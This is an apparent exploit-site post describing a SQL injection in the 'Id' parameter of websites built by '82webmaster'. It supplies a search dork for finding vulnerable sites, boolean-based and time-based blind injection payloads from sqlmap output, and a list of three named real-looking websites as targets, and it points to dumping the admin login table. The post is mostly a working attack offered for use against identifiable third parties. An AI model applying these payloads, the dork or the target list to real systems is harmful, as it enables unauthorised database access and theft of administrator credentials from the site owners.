82webmaster SQL Injection Vulnerability Tested on BackBox GNU/Linux

Information Exploit

[+] Exploit Title : 82webmaster sql injection vulnerability
[+] Author : Gama Security Team | CXsecurity.com
[+] Dork : Design & Developed By: 82webmaster
[+] Tested on : BackBox GNU/Linux, Chrome

[+] Exploit/Payload :

http://site.com/contact.php?Id=1[SQL]

example :

http://target.com/contact.php?Id=1[SQL]

Poc SQLMap Parameter ID :

Parameter: Id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Id=1 AND 6951=6951
    Type: time-based blind
    Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
    Payload: Id=1 AND 2862=BENCHMARK(5000000,MD5(0x624c5a6c))

[+] Poc local login : N/A

On Target :
- http://hawxgear.com/contect.php?Id=1
- http://gear-well.com/contect.php?Id=1
- https://mubariksons.com/about.php?Id=1

====================================================
====================================================

Vulnerability get database

tbl_admin login

============================================
============================================

Video

Exploit : [cxsecurity]